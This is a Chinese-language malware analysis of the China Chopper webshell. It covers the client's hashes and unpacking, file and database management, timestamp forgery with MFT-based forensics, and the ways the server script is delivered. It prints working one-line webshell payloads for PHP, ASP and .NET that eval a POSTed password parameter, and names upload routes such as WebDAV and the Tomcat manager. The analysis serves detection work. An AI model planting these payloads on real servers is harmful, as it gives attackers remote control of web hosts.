Chopper是中國黑客圈內(nèi)使用非常廣泛的一款Webshell管理工具。中國菜刀用途十分廣泛，支持多種語言，小巧實(shí)用。

[[266916]]

Web Shell客戶端

中國菜刀的客戶端可在www.maicaidao.com下載到。

Web shell (CnC) Client MD5 
caidao.exe 5001ef50c7e869253a7c152a638eab8a 

注：這里可以對(duì)你的下載菜單的MD5值是否相同，如果不同則有可能加了后門或者捆綁了木馬。

客戶端使用UPX加殼，有220672個(gè)字節(jié)大小，如圖1所示：

使用脫殼工具脫殼，可以看到一些隱藏的細(xì)節(jié)：

C:Documents and SettingsAdministratorDesktop>upx -d 5001ef50c7e869253a7c152a638eab8a.exe -o decomp.exeUltimate Packer for eXecutablesCopyright (C) 1996 - 2011 
UPX 3.08w Markus Oberhumer, Laszlo Molnar & John Reiser Dec 12th 2011 
File size Ratio Format Name 
-------------------- ------ ----------- ----------- 
700416 <- 220672 31.51% win32/pe decomp.exe 
Unpacked 1 file. 

使用PEID(一個(gè)免費(fèi)檢測軟件使用的加殼手法的工具)，我們可以看到解壓縮后的客戶端程序使用Visual C + + 6.0編寫，如圖2所示：

因?yàn)樽址疀]有進(jìn)行編碼，所以可以通過打印輸出該后門如何通信，我們可以看到一個(gè)url google.com.hk(圖3)，以及參考文本Chopper(圖4）。

打開中國菜刀界面，我們可以看到該工具是一款圖形界面工具，并且提供了添加自己的目標(biāo)、管理的功能，在客戶端軟件上，右鍵單擊選擇“添加”，輸入IP地址，以及密碼和編碼方式，如圖5所示：

服務(wù)端payload組件

中國菜刀的工具是一款Webshell管理工具，相應(yīng)必然有一個(gè)服務(wù)端的程序，它支持各種語言，如ASP、ASPX、PHP、JSP、CFM，一些官網(wǎng)下載原始程序MD5 HASH如下：

Web shell Payload MD5 Hash 
Customize.aspx 8aa603ee2454da64f4c70f24cc0b5e08 
Customize.cfm ad8288227240477a95fb023551773c84 
Customize.jsp acba8115d027529763ea5c7ed6621499 

例子如下：

PHP: <?php @eval($_POST['pass']);?> 
ASP: <%eval request("pass")%> 
.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 

在實(shí)際使用過程中，替換PASS為鏈接的時(shí)候需要的密碼。

功能

上面簡單介紹了中國菜刀的客戶端和服務(wù)端的，下面來介紹下該款工具的其他功能，中國菜刀包含了“安全掃描”功能，攻擊者能夠使用爬蟲或暴力破解來攻擊目標(biāo)站點(diǎn)，如下圖：

在除了發(fā)現(xiàn)漏洞之外，中國菜刀最強(qiáng)大的莫過于管理功能了，包含以下內(nèi)容：

• 文件管理(文件資源管理器)
• 數(shù)據(jù)庫管理(DB客戶端)
• 虛擬終端(命令行)

在中國菜刀的客戶端界面中，右鍵單擊一個(gè)目標(biāo)可以查看相應(yīng)的功能列表，如圖7：

文件管理

中國菜刀作為一個(gè)遠(yuǎn)程訪問工具(RAT)，包含了常見的上傳、下載、編輯、刪除、復(fù)制、重命名以及改變文件的時(shí)間戳。如圖8：

修改文件功能現(xiàn)在常見的webshell就帶了該功能，圖9顯示了測試目錄的三個(gè)文件，因?yàn)閃indows資源管理器只顯示“修改日期”字段，所以通常情況下，能夠達(dá)到隱藏操作的目的。

使用工具將文件修改和其他兩個(gè)文件相同，如圖10，可以看到文件的修改的日期和其他兩個(gè)文件一致，如果不是專業(yè)的人士，一般不會(huì)看出這幾個(gè)文件的區(qū)別：

當(dāng)文件的創(chuàng)建日期和修改日期被修改之后，查出異常文件非常麻煩，需要分析主文件表MFT以及FTK，fireeye建議使用工具mftdump來進(jìn)行分析，該工具能夠提取文件元數(shù)據(jù)進(jìn)行分析。

下表顯示了從MFT中提取的Webshell時(shí)間戳，注意”fn*”字段包含了文件的原始時(shí)間。

Category     Pre-touch match    Post-touch match 
siCreateTime (UTC)  6/6/2013 16:01  2/21/2003 22:48 
siAccessTime (UTC)  6/20/2013 1:41  6/25/2013 18:56 
siModTime (UTC) 6/7/2013 0:33   2/21/2003 22:48 
siMFTModTime (UTC)  6/20/2013 1:54  6/25/2013 18:56 
fnCreateTime (UTC)  6/6/2013 16:01  6/6/2013 16:01 
fnAccessTime (UTC)  6/6/2013 16:03  6/6/2013 16:03 
fnModTime (UTC) 6/4/2013 15:42  6/4/2013 15:42 
fnMFTModTime (UTC)  6/6/2013 16:04  6/6/2013 16:04 

數(shù)據(jù)庫管理

中國菜刀支持各種數(shù)據(jù)庫，如MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等，數(shù)據(jù)庫操作界面，內(nèi)置了一些常用的數(shù)據(jù)庫語句，能夠自動(dòng)顯示表名、列名，查詢語句，并且內(nèi)置了常用的數(shù)據(jù)庫語句。如下圖11：

鏈接之后，菜刀提供了一些常見的數(shù)據(jù)庫語句，如圖12：

命令行功能

最后，菜刀提供了一個(gè)命令行界面，能夠通過命令行shell進(jìn)行操作系統(tǒng)級(jí)別的互動(dòng)，當(dāng)然繼承的權(quán)限是WEB應(yīng)用的權(quán)限。如圖13：

Payload屬性

除了以上的功能之外，中國菜刀的能夠在黑客圈廣泛使用，還有以下幾個(gè)因素：

• 大小
• 服務(wù)端內(nèi)容
• 客戶端內(nèi)容
• 是否免殺

大小

中國菜刀的服務(wù)端腳本非常小，是典型的一句話木馬，其中aspx服務(wù)端軟件只有73字節(jié)，見圖14，相比其他傳統(tǒng)的webshell可見它的優(yōu)越性。

服務(wù)端內(nèi)容

中國菜刀的服務(wù)端代碼除了簡潔之外，并且支持多種加密、編碼。

客戶端內(nèi)容

在瀏覽器不會(huì)產(chǎn)生任何客戶端代碼，如圖16：

殺毒軟件檢測：

大多數(shù)殺毒軟件不能檢測出該工具。如下圖：

在第一部門份的菜刀剖析里面，已經(jīng)介紹了“中國菜刀”的易用界面以及一些高級(jí)特性。——其中最令人注目的，莫過于其作為web shell的大小，aspx版僅有73字節(jié)，在硬盤中才4k。而在這部分里，將會(huì)詳細(xì)“中國菜刀”平臺(tái)適用性、上傳機(jī)制、通訊模式以及如何偵測，至于中國菜刀一直在爭論的一個(gè)話題，有沒有后門，各位基友，您看了就知道了。

平臺(tái)：

web服務(wù)器平臺(tái)——JSP, ASP, ASPX, PHP, 或 CFM。同時(shí)在Windows和Linux適用。在系列一的分析里面已經(jīng)展示過“中國菜刀”在windows 2003 IIS 中運(yùn)行ASPX的情況。在這一部分里，講展示運(yùn)行在Linux平臺(tái)下的PHP情況。如下圖所示，PHP版本的內(nèi)容極其精簡。

依賴與不同的平臺(tái)，“中國菜刀”有不同的可選項(xiàng)。下圖顯示了在Linux平臺(tái)下的文件管理特性，(類似于Windows)

上傳機(jī)制：

由于它的大小，格式，以及簡單的payload，“中國菜刀”的傳輸機(jī)制可以很靈活多樣。以下任意一種方法都可以進(jìn)行傳輸：

• 通過WebDAV文件上傳
• 通過JBoss jmx-console 或者Apache的Tomcat管理頁面上傳
• 遠(yuǎn)程代碼執(zhí)行下載
• 通過其他方式接入后傳輸

通訊分析：

我們已經(jīng)看過它在服務(wù)器端的payload以及控制web shell的客戶端。接下來，我們檢查一下“中國菜刀”的通訊網(wǎng)絡(luò)流量。我們通過抓包軟件，分析其服務(wù)端和客戶端的通訊情況。

利用抓包軟件Wireshark的“follow the TCP”功能可以看到整個(gè)TCP數(shù)據(jù)交互過程。